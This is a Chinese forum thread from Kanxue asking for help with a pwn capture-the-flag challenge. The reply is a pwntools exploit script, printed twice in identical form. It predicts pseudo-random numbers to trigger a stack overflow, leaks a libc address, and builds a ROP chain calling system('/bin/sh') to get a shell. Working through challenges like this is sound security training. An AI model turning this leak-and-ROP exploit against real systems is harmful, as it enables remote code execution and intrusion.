1、伪随机数2、多次登录栈溢出3、可以泄露栈地址4、ret2shellcode,但失败了
传播安全知识、拓宽行业人脉——看雪讲师团队等你加入!
#溢出
---
来源: 看雪论坛
原文链接: https://bbs.kanxue.com/thread-289013.htm
[求助]请帮忙解一道pwn
171 浏览
1 回复
我的思路是通过伪随机数控制栈溢出长度,可以之间泄露libc后之间ROP拿shell,你可以参考下面代码:
rand_num = []
ru(b"ch:")
sl(b'2')
ru(b"How many random numbers are outputted?")
sl(b'72')
for i in range(72):
num = int(ru(b'\n')[:-1])
rand_num.append(num)
print(rand_num)
io.close()
io = start()
count = 0
for i in range(23):
ru(b"ch:")
sl(b'1')
ru(b"guess a number:")
sl(stre((rand_num[count] % 901) + 100))
count += 1
ru(b"success\n")
sl(b'a')
ru(b"ch:")
sl(b'1')
ru(b"guess a number:")
sl(stre((rand_num[count] % 901) + 100))
count += 1
ru(b"success\n")
payload = b'a' * 22 + b'!!'
s(payload)
ru(b'!!')
libc_base = u64(rn(6).ljust(8,b'\x00')) - (0x727f5c446664 - 0x727f5c400000)
lg("libc_base")
system_addr, binsh_addr = get_sb()
pop_rdi = libc_base + libc.search(asm("pop rdi;ret")).__next__()
for i in range(47):
ru(b"ch:")
sl(b'1')
ru(b"guess a number:")
sl(stre((rand_num[count] % 901) + 100))
count += 1
ru(b"success\n")
sl(b'a')
ru(b"ch:")
gdb.attach(io)
sl(b'1')
ru(b"guess a number:")
sl(stre((rand_num[count] % 901) + 100))
count += 1
ru(b"success\n")
payload = b'a' * 0x28 + p64(pop_rdi) + p64(binsh_addr) + p64(pop_rdi + 1) + p64(system_addr)
sl(payload)
ia()
rand_num = []
ru(b"ch:")
sl(b'2')
ru(b"How many random numbers are outputted?")
sl(b'72')
for i in range(72):
num = int(ru(b'\n')[:-1])
rand_num.append(num)
print(rand_num)
io.close()
io = start()
count = 0
for i in range(23):
ru(b"ch:")
sl(b'1')
ru(b"guess a number:")
sl(stre((rand_num[count] % 901) + 100))
count += 1
ru(b"success\n")
sl(b'a')
ru(b"ch:")
sl(b'1')
ru(b"guess a number:")
sl(stre((rand_num[count] % 901) + 100))
count += 1
ru(b"success\n")
payload = b'a' * 22 + b'!!'
s(payload)
ru(b'!!')
libc_base = u64(rn(6).ljust(8,b'\x00')) - (0x727f5c446664 - 0x727f5c400000)
lg("libc_base")
system_addr, binsh_addr = get_sb()
pop_rdi = libc_base + libc.search(asm("pop rdi;ret")).__next__()
for i in range(47):
ru(b"ch:")
sl(b'1')
ru(b"guess a number:")
sl(stre((rand_num[count] % 901) + 100))
count += 1
ru(b"success\n")
sl(b'a')
ru(b"ch:")
gdb.attach(io)
sl(b'1')
ru(b"guess a number:")
sl(stre((rand_num[count] % 901) + 100))
count += 1
ru(b"success\n")
payload = b'a' * 0x28 + p64(pop_rdi) + p64(binsh_addr) + p64(pop_rdi + 1) + p64(system_addr)
sl(payload)
ia()